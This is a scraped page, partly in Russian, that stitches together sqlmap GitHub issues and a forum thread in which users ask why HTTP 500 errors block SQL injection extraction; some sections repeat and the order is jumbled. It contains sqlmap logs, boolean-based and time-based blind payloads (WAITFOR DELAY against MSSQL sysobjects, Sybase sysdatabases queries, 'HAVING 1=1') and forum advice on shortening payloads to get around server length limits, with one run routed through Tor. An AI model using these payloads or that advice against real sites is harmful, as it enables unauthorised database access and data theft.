Sqlmap 500 error

[*] starting @ 10:41:26 /2019-06-21/ [10:41:26] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.1) Gecko/20061205 Firefox/2.0.0.1 (Debian-2.0.0...

[*] starting @ 10:41:26 /2019-06-21/

[10:41:26] [INFO] fetched random HTTP User-Agent header value ‘Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.1) Gecko/20061205 Firefox/2.0.0.1 (Debian-2.0.0.1+dfsg-2)’ from file ‘C:sqlmapdatatxtuser-agents.txt’
[10:41:26] [INFO] resuming back-end DBMS ‘mysql’
[10:41:26] [INFO] testing connection to the target URL
[10:41:27] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[10:41:27] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:

Parameter: ass (POST)
Type: boolean-based blind
Title: OR boolean-based blind — WHERE or HAVING clause
Payload: chasu1=284&chasu2=864&ass=-7375 OR 1048=1048— FngK&hogi=1

[10:41:27] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.1, Nginx, PHP
back-end DBMS: MySQL 5 (MariaDB fork)
[10:41:27] [INFO] fetching tables for database: ‘wizards_1111’
[10:41:27] [INFO] fetching number of tables for database ‘wizards_1111’
[10:41:27] [WARNING] reflective value(s) found and filtering out
[10:41:27] [INFO] retrieved:
[10:41:28] [WARNING] unable to retrieve the number of tables for database ‘wizards_1111’
[10:41:28] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] y
which common tables (wordlist) file do you want to use?
[1] default ‘C:sqlmapdatatxtcommon-tables.txt’ (press Enter)
[2] custom

1
[10:42:29] [INFO] checking table existence using items from ‘C:sqlmapdatatxtcommon-tables.txt’
[10:42:29] [INFO] adding words used on web page to the check list
[10:42:29] [INFO] starting 10 threads
[10:42:38] [INFO] tried 170/3356 items (5%)
[10:42:39] [INFO] waiting for threads to finish (Ctrl+C was pressed)
[10:42:39] [WARNING] user aborted during table existence check. sqlmap will display partial output

[10:42:39] [WARNING] no table(s) found
No tables found
[10:42:39] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) — 1 times
[10:42:39] [INFO] fetched data logged to text files under ‘C:UsersLottoAppDataLocalsqlmapoutputwww.wizard1111.com’

[*] ending @ 10:42:39 /2019-06-21/

I tried many things but i cant get tables~ plz help me~

Источник

Содержание

  1. sqlmap API failing? #2741
  2. Comments
  3. What’s the problem (or question)?
  4. Do you have an idea for a solution?
  5. How can we reproduce the issue?
  6. What are the running context details?
  7. Вопрос по sqlmap | Ошибка 500 | длинный get запрос
  8. Fructoza77
  9. Legacy DBMS Sybase 12 problems #2946
  10. Comments
  11. What’s the problem (or question)?
  12. Do you have an idea for a solution?
  13. How can we reproduce the issue?
  14. What are the running context details?
  15. Input
  16. Output
  17. Footer

sqlmap API failing? #2741

What’s the problem (or question)?

I have an application that connects to sqlmap’s API and runs a scan from the API, during the scanning I’m getting a 500 internal server error from my application, and a OSError from the sqlmapapi server.

Do you have an idea for a solution?

I have a feeling its coming the the fact that sqlmap calls sqlmap —api -c to run the API (that’s what I’ve gathered anyways, correct me if I’m wrong)

How can we reproduce the issue?

  1. Run sqlmapapi.py -s
  2. Connect to the API via thirdparty application
  3. Try to initialize a scan
  4. Try to start the scan
  5. Should fail here

What are the running context details?

  • Installation method (e.g. pip , apt-get , git clone or zip / tar.gz ): git clone
  • Client OS (e.g. Microsoft Windows 10 ) Ubuntu 17.04
  • Program version ( python sqlmap.py —version or sqlmap —version depending on installation): updated to the latest revision ‘f9de8a8’
  • Target DBMS (e.g. Microsoft SQL Server ): n/a
  • Detected WAF/IDS/IPS protection (e.g. ModSecurity or unknown ): n/a
  • SQLi techniques found by sqlmap (e.g. error-based and boolean-based blind ): n/a
  • Results of manual target assessment (e.g. found that the payload query=test’ AND 4113 IN ((SELECT ‘foobar’))— qKLV works): n/a
  • Relevant console output (if any):
    From my application when connecting:

From the sqlmap API itself:

  • Exception traceback (if any): Same as above

The text was updated successfully, but these errors were encountered:

Источник

Вопрос по sqlmap | Ошибка 500 | длинный get запрос

Fructoza77

New member

ncreasing default value for option ‘—time-sec’ to 10 because switch ‘—tor’ was provided
[54:54:40] [INFO] setting Tor SOCKS proxy settings
[54:54:41] [INFO] fetched random HTTP User-Agent header value ‘Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.6) Gecko/20050321 Firefox/1.0.2’ from file ‘/usr/share/sqlmap/data/txt/user-agents.txt’
[54:54:41] [INFO] checking Tor connection
[54:54:42] [INFO] Tor is properly being used
[54:54:45] [WARNING] it appears that you have provided tainted parameter values (‘id=») with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[54:54:47] [INFO] resuming back-end DBMS ‘microsoft sql server’
[54:54:47] [INFO] testing connection to the target URL
[54:54:48] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own (‘ASPSESSIONIDQCTATTCR=NDPDIAFAGLC. CKOMFLGMOI’). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: 0:0:10′—

Type: time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF — comment)
Payload: 0:0:10′—

[54:54:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8.1 or 2012 R2
web application technology: Apache, ASP.NET, ASP, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2012
[54:54:49] [INFO] fetching tables for database: FF_Admin
[54:54:49] [INFO] fetching number of tables for database ‘FF_Admin’
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] n
[54:54:52] [WARNING] it’s highly recommended to avoid usage of switch ‘—tor’ for time-based injections because of inherent high latency time
[54:54:52] [WARNING] time-based comparison requires larger statistical model, please wait. (done)
[54:54:07] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[54:54:08] [WARNING] in case of continuous data retrieval problems you are advised to try a switch ‘—no-cast’ or switch ‘—hex’
[54:54:08] [INFO] resumed: 0
[54:54:08] [CRITICAL] unable to retrieve the tables for any database
[54:54:08] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) — 34 times

[54:54:52] [DEBUG] cleaning up configuration parameters
[54:54:52] [DEBUG] setting the HTTP timeout
[54:54:52] [DEBUG] setting the HTTP User-Agent header
[54:54:52] [DEBUG] loading random HTTP User-Agent header(s) from file ‘/usr/share/sqlmap/data/txt/user-agents.txt’
[54:54:52] [INFO] fetched random HTTP User-Agent header value ‘Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.5 (KHTML, like Gecko) Safari/125.9’ from file ‘/usr/share/sqlmap/data/txt/user-agents.txt’
[54:54:52] [DEBUG] creating HTTP requests opener object
[54:54:54] [WARNING] it appears that you have provided tainted parameter values (‘id=») with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[54:54:59] [INFO] resuming back-end DBMS ‘microsoft sql server’
[54:54:59] [DEBUG] resolving hostname ‘hoic.org’
[54:55:00] [INFO] testing connection to the target URL
[54:55:00] [DEBUG] declared web page charset ‘iso-8859-1’
[54:55:00] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
[54:55:00] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own (‘ASPSESSIONIDQCTATTCR=NFPDIAFAEEF. MLJGFMAFKE’). Do you want to use those [Y/n] y
[54:55:05] [DEBUG] resuming NULL connection method ‘HEAD’
sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: 0:0:5′—
Vector: ;IF([INFERENCE]) WAITFOR DELAY ‘0:0:[SLEEPTIME]’—

Type: time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF — comment)
Payload: 0:0:5′—
Vector: IF([INFERENCE]) WAITFOR DELAY ‘0:0:[SLEEPTIME]’—

[54:55:05] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP
back-end DBMS: Microsoft SQL Server 2012
[54:55:05] [INFO] fetching tables for database: FF_Admin
[54:55:05] [INFO] fetching number of tables for database ‘FF_Admin’
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] n
[54:55:08] [PAYLOAD] ‘ IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM FF_Admin..sysobjects WHERE FF_Admin..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>51) WAITFOR DELAY ‘0:0:5’—
[54:55:08] [WARNING] time-based comparison requires lar[54:55:08] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:08] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:09] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:09] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:09] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:10] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:10] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:11] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:11] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:11] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:11] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:12] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:12] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:12] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:12] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:12] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:13] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:13] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:13] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:13] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:14] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:14] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:14] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:14] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:14] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:15] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:15] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:15] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:15] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:16] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
. (done)
[54:55:16] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
[54:55:16] [PAYLOAD] ‘ IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM FF_Admin..sysobjects WHERE FF_Admin..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>48) WAITFOR DELAY ‘0:0:5’—
[54:55:16] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[54:55:16] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
[54:55:16] [PAYLOAD] ‘ IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM FF_Admin..sysobjects WHERE FF_Admin..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>9) WAITFOR DELAY ‘0:0:5’—
[54:55:16] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
[54:55:16] [INFO] retrieved:
[54:55:16] [DEBUG] performed 3 queries in 10.99 seconds
[54:55:16] [WARNING] in case of continuous data retrieval problems you are advised to try a switch ‘—no-cast’ or switch ‘—hex’
[54:55:16] [INFO] resumed: 0
[54:55:16] [DEBUG] performed 0 queries in 0.01 seconds
[54:55:16] [CRITICAL] unable to retrieve the tables for any database
[54:55:16] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) — 34 times

На соседнем форуме дали следующие советы:
1.
Ну собственно и причина твоих ошибок 500.
‘ IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM FF_Admin..sysobjects WHERE FF_Admin..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>51) WAITFOR DELAY ‘0:0:5’—

Ты смог получить имена бд потому что твой гет запрос был еще в пределах нормы, когда же ты стал пытаться этим же запросом получить имена таблиц, то у тебя гет запрос стал слишком длинный и как следствие сервер ругается на длинну запроса. Если бы ты смог получить колонки, то дальше ты бы уперся в запрос получения данных из колонок. Тебе нужно думать как изменить пайлоад, что бы он подходил под критерии максимальной длинны запроса. Когда ты решишь этот вопрос, то получишь все что хотел.
2.
Малясь ошибся, ты смог получить имена бд. Но вот на стадии запроса что бы узнать имена таблиц ты и уперся в лимит. Далее логика все та же, ну суть я думаю уловил.
Проще будет воспользоваться бурпом, там ты пайлоад сможешь легко отредактировать. В мапе же тебе придется много раз редактировать файл с пайлоадом, что бы подобрать. А также советую почитать немного что из себя представляет в целом sql синтаксис

Источник

Legacy DBMS Sybase 12 problems #2946

What’s the problem (or question)?

There is a legacy database server were im performing a SQL inyection. The DBMS is Sybase and banner identify «Adaptive Server Enterprise 12.0». sqlmap idenitfy Blind Boolean SQL Inyection. I can´t perfrom the usual comands such as «—dbs», «—tables» because sqlmap identify «Error 500» on HTTP requests and sqlmap process finishes.

I identify this is not a false positive since I can extract some information from the server with «—sql-query» using sybase global variables (@@Version) and sybase functions (db_name, date, host_name, db_user, object_name).

Do you have an idea for a solution?

Maybe the issue ocurres because Sybase version 12 is a legacy version and is not suported by some technology nowadays. Maybe sqlmap 1.2.2.16 is not compatible with legacy DBMS such as this one.

How can we reproduce the issue?

  1. Perform a blind boolean sql inyection to a Sybase legacy version in my case «Adaptive Server Enterprise 12.0»
  2. Sqlmap identfys the Blinf Booleand SQL inyection
  3. Perform the comand » ./sqlmap.py —methid=post —data= —url= —no-cast —dbms=sybase —dbs» to extarct database names.
  4. Error 500 will apear on console: HTTP requets and sybase process will be finished ([WARNING] unexpected HTTP code ‘500’ detected. Will use (extra) validation step in similar cases)

What are the running context details?

I do a git clone from the proyect master brench
OS: sqlmap executed on Kali Linux 2018.1.
Program version: sqlmap 1.2.2.16#dev
No WAF is detected (wafw00f)
SQLi technique found by sqlmap: boolean-based blind
SQL map command: python ./sqlmap.py —method=post —data=cat1&var2—url=https://. com —no-cast —dbms=sybase —dbs
Relevant console output: [WARNING] unexpected HTTP code ‘500’ detected. Will use (extra) validation step in similar cases

Web application target is a codeigniter on centOS. Database server is Sybase 12 on Solaris.
There is a similar issue as mine #2634

The text was updated successfully, but these errors were encountered:

try —ignore-code=500 as fast check.

Still now working.

Input

root@DESKTOP-XXXX:/mnt/c/Users/XXXX/sqlmap# python ./sqlmap.py —method=POST —ignore-code=500 —dbms=sybase —data=»XXX=XXX» —no-cast —url=»XXXX» —threads=9 —dbs

Output

[10:09:55] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: — Parameter: XXXXX (POST) Type: boolean-based blind Title: AND boolean-based blind — WHERE or HAVING clause Payload: XXXX=XXX AND 3025=3025 — [10:09:55] [INFO] testing Sybase [10:09:55] [INFO] confirming Sybase [10:09:55] [INFO] the back-end DBMS is Sybase web server operating system: Linux CentOS web application technology: Apache 2.4.6, PHP 5.4.16 back-end DBMS: Sybase [10:09:55] [INFO] fetching database names [10:09:55] [INFO] retrieved: [10:09:56] [WARNING] unexpected HTTP code ‘500’ detected. Will use (extra) validation step in similar cases [10:09:56] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) — 3 times [10:09:56] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/XXXX’ [*] shutting down at 10:09:56

#2634 is not the similar issue. In that issue Sybase has been misidentified as MsSQL DBMS.

500 means that something really wrong is happening. You should for start take a look into the content of the returned web server response. Maybe something useful can be found there. Use -t traffic.txt or —proxy to find out.

Other than that, without you debugging the issue at your end I can’t help you. Sybase 12 is supported by sqlmap.

Here is traffic.txt file:

HTTP request [#2]: POST /XXXX/%C2%B0GkxX7zMtm21NpzgAIQlrcyl2A4jSnlVgC9jnykH5J4o8pAczzDPl0Nh4K5g2G%C2%B05+5Pg1PBiK47CzA7sWK4thvD%C2%B06Il5%C2%B0TLzibxK%C2%B0S3ypLMpCBbvrLcuHI2%C2%B0mEbISkYom3h7Mgb3TNgLMf%C2%B0BvOFdoFtSxkmStT3nKVF2fSvVmKU=/XXXX HTTP/1.1 Host: XXXX Accept-encoding: gzip,deflate Cache-control: no-cache Content-type: application/x-www-form-urlencoded; charset=utf-8 Accept: */* User-agent: sqlmap/1.2.2.16#dev (http://sqlmap.org) Cookie: ci_session=4la2cljrsdh883no89mc3i7tqo21634v Content-length: 162 Connection: close XXXX=XXXX%20AND%20ASCII%28SUBSTRING%28%28SELECT%20COUNT%28%2A%29%20FROM%20%28SELECT%20name%20FROM%20master..sysdatabases%29%20AS%20pkcB%29%2C1%2C1%29%29%3E51 HTTP response [#2] (500 Internal Server Error): Content-length: 0 X-powered-by: PHP/5.4.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Uri: XXXX/%C2%B0GkxX7zMtm21NpzgAIQlrcyl2A4jSnlVgC9jnykH5J4o8pAczzDPl0Nh4K5g2G%C2%B05+5Pg1PBiK47CzA7sWK4thvD%C2%B06Il5%C2%B0TLzibxK%C2%B0S3ypLMpCBbvrLcuHI2%C2%B0mEbISkYom3h7Mgb3TNgLMf%C2%B0BvOFdoFtSxkmStT3nKVF2fSvVmKU=/XXXX Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16 Connection: close Pragma: no-cache Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Date: Sun, 25 Feb 2018 17:19:57 GMT Content-type: text/html; charset=UTF-8 ############################################################################ HTTP request [#3]: POST /XXXX/%C2%B0GkxX7zMtm21NpzgAIQlrcyl2A4jSnlVgC9jnykH5J4o8pAczzDPl0Nh4K5g2G%C2%B05+5Pg1PBiK47CzA7sWK4thvD%C2%B06Il5%C2%B0TLzibxK%C2%B0S3ypLMpCBbvrLcuHI2%C2%B0mEbISkYom3h7Mgb3TNgLMf%C2%B0BvOFdoFtSxkmStT3nKVF2fSvVmKU=/XXXX HTTP/1.1 Host: XXXX Accept-encoding: gzip,deflate Cache-control: no-cache Content-type: application/x-www-form-urlencoded; charset=utf-8 Accept: */* User-agent: sqlmap/1.2.2.16#dev (http://sqlmap.org) Cookie: ci_session=4la2cljrsdh883no89mc3i7tqo21634v Content-length: 162 Connection: close XXXX=XXXX%20AND%20ASCII%28SUBSTRING%28%28SELECT%20COUNT%28%2A%29%20FROM%20%28SELECT%20name%20FROM%20master..sysdatabases%29%20AS%20pkcB%29%2C1%2C1%29%29%3E48 HTTP response [#3] (500 Internal Server Error): Content-length: 0 X-powered-by: PHP/5.4.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Uri: XXXX/%C2%B0GkxX7zMtm21NpzgAIQlrcyl2A4jSnlVgC9jnykH5J4o8pAczzDPl0Nh4K5g2G%C2%B05+5Pg1PBiK47CzA7sWK4thvD%C2%B06Il5%C2%B0TLzibxK%C2%B0S3ypLMpCBbvrLcuHI2%C2%B0mEbISkYom3h7Mgb3TNgLMf%C2%B0BvOFdoFtSxkmStT3nKVF2fSvVmKU=/XXXX Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16 Connection: close Pragma: no-cache Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Date: Sun, 25 Feb 2018 17:19:57 GMT Content-type: text/html; charset=UTF-8 ############################################################################ HTTP request [#4]: POST /XXXX/%C2%B0GkxX7zMtm21NpzgAIQlrcyl2A4jSnlVgC9jnykH5J4o8pAczzDPl0Nh4K5g2G%C2%B05+5Pg1PBiK47CzA7sWK4thvD%C2%B06Il5%C2%B0TLzibxK%C2%B0S3ypLMpCBbvrLcuHI2%C2%B0mEbISkYom3h7Mgb3TNgLMf%C2%B0BvOFdoFtSxkmStT3nKVF2fSvVmKU=/XXXX HTTP/1.1 Host: XXXX Accept-encoding: gzip,deflate Cache-control: no-cache Content-type: application/x-www-form-urlencoded; charset=utf-8 Accept: */* User-agent: sqlmap/1.2.2.16#dev (http://sqlmap.org) Cookie: ci_session=4la2cljrsdh883no89mc3i7tqo21634v Content-length: 161 Connection: close XXXX=XXXX%20AND%20ASCII%28SUBSTRING%28%28SELECT%20COUNT%28%2A%29%20FROM%20%28SELECT%20name%20FROM%20master..sysdatabases%29%20AS%20pkcB%29%2C1%2C1%29%29%3E9 HTTP response [#4] (500 Internal Server Error): Content-length: 0 X-powered-by: PHP/5.4.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Uri: XXXX/%C2%B0GkxX7zMtm21NpzgAIQlrcyl2A4jSnlVgC9jnykH5J4o8pAczzDPl0Nh4K5g2G%C2%B05+5Pg1PBiK47CzA7sWK4thvD%C2%B06Il5%C2%B0TLzibxK%C2%B0S3ypLMpCBbvrLcuHI2%C2%B0mEbISkYom3h7Mgb3TNgLMf%C2%B0BvOFdoFtSxkmStT3nKVF2fSvVmKU=/XXXX Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16 Connection: close Pragma: no-cache Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Date: Sun, 25 Feb 2018 17:19:58 GMT Content-type: text/html; charset=UTF-8

When i do a —sql-query «db_name()» traffic.txt is the following:

HTTP request [#41]: POST /XXXX/%C2%B0GkxX7zMtm21NpzgAIQlrcyl2A4jSnlVgC9jnykH5J4o8pAczzDPl0Nh4K5g2G%C2%B05+5Pg1PBiK47CzA7sWK4thvD%C2%B06Il5%C2%B0TLzibxK%C2%B0S3ypLMpCBbvrLcuHI2%C2%B0mEbISkYom3h7Mgb3TNgLMf%C2%B0BvOFdoFtSxkmStT3nKVF2fSvVmKU=/XXXX HTTP/1.1 Host: XXXX Accept-encoding: gzip,deflate Cache-control: no-cache Content-type: application/x-www-form-urlencoded; charset=utf-8 Accept: */* User-agent: sqlmap/1.2.2.16#dev (http://sqlmap.org) Cookie: ci_session=vaf9dv01jtdkjs851d1rsgtn50rdrsvd Content-length: 89 Connection: close XXXX=XXXX%20AND%20ASCII%28SUBSTRING%28%28SELECT%20db_name%28%29%29%2C8%2C1%29%29%3E1 HTTP response [#41] (200 OK): X-powered-by: PHP/5.4.16 Transfer-encoding: chunked Expires: Thu, 19 Nov 1981 08:52:00 GMT Uri: https://XXXX/%C2%B0GkxX7zMtm21NpzgAIQlrcyl2A4jSnlVgC9jnykH5J4o8pAczzDPl0Nh4K5g2G%C2%B05+5Pg1PBiK47CzA7sWK4thvD%C2%B06Il5%C2%B0TLzibxK%C2%B0S3ypLMpCBbvrLcuHI2%C2%B0mEbISkYom3h7Mgb3TNgLMf%C2%B0BvOFdoFtSxkmStT3nKVF2fSvVmKU=/XXXX Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16 Connection: close Pragma: no-cache Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Date: Sun, 25 Feb 2018 17:29:08 GMT Content-type: text/html; charset=UTF-8 .

It is not clear what seems to be the problem as you are getting empty 500 responses. Though, I would say that you have permission problems (or something is blocking your requests) as you are getting those when poking master..sysdatabases

© 2023 GitHub, Inc.

You can’t perform that action at this time.

You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.

Источник

Источник

How can i do this for 500 Internal server error? #3770

Comments

mrblackfree commented Jun 21, 2019

[*] starting @ 10:41:26 /2019-06-21/

[10:41:26] [INFO] fetched random HTTP User-Agent header value ‘Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.1) Gecko/20061205 Firefox/2.0.0.1 (Debian-2.0.0.1+dfsg-2)’ from file ‘C:sqlmapdatatxtuser-agents.txt’
[10:41:26] [INFO] resuming back-end DBMS ‘mysql’
[10:41:26] [INFO] testing connection to the target URL
[10:41:27] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[10:41:27] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:

Parameter: ass (POST)
Type: boolean-based blind
Title: OR boolean-based blind — WHERE or HAVING clause
Payload: chasu1=284&chasu2=864&ass=-7375 OR 1048=1048— FngK&hogi=1

[10:41:27] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.1, Nginx, PHP
back-end DBMS: MySQL 5 (MariaDB fork)
[10:41:27] [INFO] fetching tables for database: ‘wizards_1111’
[10:41:27] [INFO] fetching number of tables for database ‘wizards_1111’
[10:41:27] [WARNING] reflective value(s) found and filtering out
[10:41:27] [INFO] retrieved:
[10:41:28] [WARNING] unable to retrieve the number of tables for database ‘wizards_1111’
[10:41:28] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] y
which common tables (wordlist) file do you want to use?
[1] default ‘C:sqlmapdatatxtcommon-tables.txt’ (press Enter)
[2] custom

1
[10:42:29] [INFO] checking table existence using items from ‘C:sqlmapdatatxtcommon-tables.txt’
[10:42:29] [INFO] adding words used on web page to the check list
[10:42:29] [INFO] starting 10 threads
[10:42:38] [INFO] tried 170/3356 items (5%)
[10:42:39] [INFO] waiting for threads to finish (Ctrl+C was pressed)
[10:42:39] [WARNING] user aborted during table existence check. sqlmap will display partial output

[10:42:39] [WARNING] no table(s) found
No tables found
[10:42:39] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) — 1 times
[10:42:39] [INFO] fetched data logged to text files under ‘C:UsersLottoAppDataLocalsqlmapoutputwww.wizard1111.com’

[*] ending @ 10:42:39 /2019-06-21/

I tried many things but i cant get tables

The text was updated successfully, but these errors were encountered:

Источник

sqlmap API failing? #2741

Comments

Ekultek commented Oct 11, 2017 •

What’s the problem (or question)?

I have an application that connects to sqlmap’s API and runs a scan from the API, during the scanning I’m getting a 500 internal server error from my application, and a OSError from the sqlmapapi server.

Do you have an idea for a solution?

I have a feeling its coming the the fact that sqlmap calls sqlmap —api -c to run the API (that’s what I’ve gathered anyways, correct me if I’m wrong)

How can we reproduce the issue?

  1. Run sqlmapapi.py -s
  2. Connect to the API via thirdparty application
  3. Try to initialize a scan
  4. Try to start the scan
  5. Should fail here

What are the running context details?

  • Installation method (e.g. pip , apt-get , git clone or zip / tar.gz ): git clone
  • Client OS (e.g. Microsoft Windows 10 ) Ubuntu 17.04
  • Program version ( python sqlmap.py —version or sqlmap —version depending on installation): updated to the latest revision ‘f9de8a8’
  • Target DBMS (e.g. Microsoft SQL Server ): n/a
  • Detected WAF/IDS/IPS protection (e.g. ModSecurity or unknown ): n/a
  • SQLi techniques found by sqlmap (e.g. error-based and boolean-based blind ): n/a
  • Results of manual target assessment (e.g. found that the payload query=test’ AND 4113 IN ((SELECT ‘foobar’))— qKLV works): n/a
  • Relevant console output (if any):
    From my application when connecting:

From the sqlmap API itself:

  • Exception traceback (if any): Same as above

The text was updated successfully, but these errors were encountered:

Источник

Dump blank data and throw 500 internal server error #2315

Comments

discoveredf commented Dec 22, 2016

What’s the problem (or question)?

I am trying to exploit time based sql injection against Mssql server 2008.
Sqlmap Command: python sqlmap.py -r target.txt —risk 3 —level 5 —force-ssl -p usr —technique T —dbms=mssql —current-db —no-cast -v 3
Parameter: usr (POST) Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (IF) Payload: __VIEWSTATE=/wEPDwUKLTQ=&usr=test’ WAITFOR DELAY ‘0:0:5’— auOY&pwd=hhh&btn=Submit Vector: IF([INFERENCE]) WAITFOR DELAY ‘0:0:[SLEEPTIME]’

Sqlmap can send more than 15 request without any errors . Then it output 500 Internal Server Error every request . And dump blank data. But sqlmap can dump the —banner nicely.

i have checked manually if the server working normally without any sql query. But also with normal url request it throws error code 500, and it persists about 30 minutes.

I am not sure why sqlmap not getting the errors in first 15-20 and why the errors after 15-20 queries. And how do i exploit such vulnerability with sqlmap?

The text was updated successfully, but these errors were encountered:

stamparm commented Dec 22, 2016

Have it occurred that there is some protection at the other end? Closing this down

stamparm commented Dec 22, 2016

Please don’t open this kind of Issues any more

discoveredf commented Dec 22, 2016

discoveredf commented Dec 25, 2016 •

Don’t mind please , i have another question before opening new post.

Sending post request :
__VIEWSTATE==&__EVENTVALIDATION==&txtUser=test’ HAVING 1=1—&txtPass=test

Gives me output like this:

**Column ‘User.UserID’ is invalid** in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

Server Error in ‘/’ Application.

